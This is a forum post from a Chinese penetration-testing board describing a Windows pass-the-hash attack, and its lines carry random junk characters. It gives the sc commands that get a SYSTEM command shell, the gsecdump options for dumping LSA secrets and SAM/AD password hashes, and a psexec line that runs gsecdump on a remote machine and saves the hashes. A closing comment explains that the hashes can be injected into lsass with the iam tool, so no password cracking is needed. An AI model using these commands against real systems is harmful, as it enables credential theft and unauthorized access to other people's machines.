找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 HASH注入式攻击
欢迎中测联盟老会员回家,1997年注册的域名
返回列表 发新帖
查看: 1879|回复: 0
打印 上一主题 下一主题

HASH注入式攻击

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2012-11-6 21:09:29 | 只看该作者 回帖奖励 |正序浏览 |阅读模式
o get a DOS Prompt as NT system:" g; _" l+ x* \- O1 a
0 j! G9 _  \8 B
C:\>sc create shellcmdline binpath= "C:\WINDOWS\system32\cmd.exe /K start" type= own type= interact
! n" a5 Y- g! G[SC] CreateService SUCCESS9 g* |. E1 a8 o, i% w/ `
! d5 B. s, x, a" |
C:\>sc start shellcmdline
2 a( G; u) O& X3 s! ?5 F[SC] StartService FAILED 1053:6 r: D" L* w9 Z2 N# y& F

# X1 S2 @$ M( pThe service did not respond to the start or control request in a timely fashion.
1 R' M& D1 N9 n& A% b& @) {$ n/ t- m$ g7 K* w% U
C:\>sc delete shellcmdline
9 y6 {* _2 ]- _$ O# x# p& a[SC] DeleteService SUCCESS( I; J  n5 V) G$ B$ l
5 z3 Q! T6 R# A; B8 x) x
------------
( o  j. n9 [; P$ \5 `/ L9 {
: G0 s0 O) _" Y5 \Then in the new DOS window:7 c1 b' U. y1 ~8 q8 Q$ F
$ P3 a  d9 t% b. W3 v
Microsoft Windows XP [Version 5.1.2600]
0 V4 F5 X8 h# \: ~+ D) N(C) Copyright 1985-2001 Microsoft Corp.
$ q4 e9 {9 _/ ~+ Z& [# Y
' R* b% _6 b$ s5 vC:\WINDOWS\system32>whoami
' ^4 Y3 F2 p7 c( r) d; _8 ZNT AUTHORITY\SYSTEM# o  I' S$ ^$ ]4 D9 f
9 I3 P3 R1 D( M" `6 M5 c" ~- r
C:\WINDOWS\system32>gsecdump -h3 I! B- Y/ C9 Z: P2 B
gsecdump v0.6 by Johannes Gumbel (链接标记johannes.gumbel@truesec.se)& L3 N! d5 Q! H3 C0 }# w& D, n! j
usage: gsecdump [options]% s; K+ e: p  r5 j0 W& |
9 B3 s, B2 Y1 B& ^/ C
options:
' }4 y3 J' o. N: Q0 ]$ C-h [ --help ] show help9 P& \7 e* |' @  }( s8 i1 L% |3 K
-a [ --dump_all ] dump all secrets; t. P$ h% }& m% a- [- w5 i
-l [ --dump_lsa ] dump lsa secrets
# `% G, O* i4 Z-w [ --dump_wireless ] dump microsoft wireless connections# X2 b, K" O$ G: S: I) }( W( e
-u [ --dump_usedhashes ] dump hashes from active logon sessions; Z4 W8 r  [! I/ Q! y
-s [ --dump_hashes ] dump hashes from SAM/AD
& A+ B- R: F8 B- Z. z" s; ?& D& W' \7 F7 G7 x' `0 ~! F2 B& P9 {2 X; q
Although I like to use:- S# _9 ~4 x; |/ j* h, X

) G9 V0 ?2 X9 k0 j) Z' z( g6 j# RPsExec v1.83 - Execute processes remotely
+ y. |& C  v9 Z( n' E, D7 }2 XCopyright (C) 2001-2007 Mark Russinovich" h6 q4 I% i' \/ Q
Sysinternals - 链接标记[url]www.sysinternals.com[/url]% D# [( ]5 m/ i& L- k' N% N% d6 B

& ]  Z% o/ _$ l: wC:\>psexec \\COMPUTER -u user -p password -s -f -c gsecdump.exe -u >Active-HASH.TXT
% L9 ]: B. P; a, V, Q  T' Q7 F9 e' M- t' |1 h! B7 N
to get the hashes from active logon sessions of a remote system.. h3 G4 l6 {9 N, S
) a  X; t& y$ e9 F
These are a lot better than getting a cachedump of the Cached Credentials because these hashes are LMHashes that can be easily broken with Rainbow Tables.  }* Z' F$ }1 e: ~  D6 M/ B
0 r+ L) ~; G4 @
提示一下,可以使用pshtools工具包中的iam,把刚才使用gsecdump抓取出来HASH信息导入本地的lsass进程,来实现hash注入式攻击,还是老外厉害,这下管理员有得忙了,ARP欺骗的时候获得的LM/NThash,还有gethash获得的,其实根本不用破解密码,这个就是利用工具了,原文说的好,不管密码是设置4位还是127位,只要有了hash,100%就能搞定了.
& N+ r  T1 M: L8 W5 \原文出处:链接标记[url]http://truesecurity.se/blogs/mur ... -text-password.aspx[/url]; N4 K: c. S& `/ @, g
' o( k( t8 b( |* C% h/ q5 t, \
我看了下原文出处,貌似是/2007/03/16/郁闷啊,差距。
" f0 _8 h4 u1 k7 _* `2 p. y0 j" ?
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表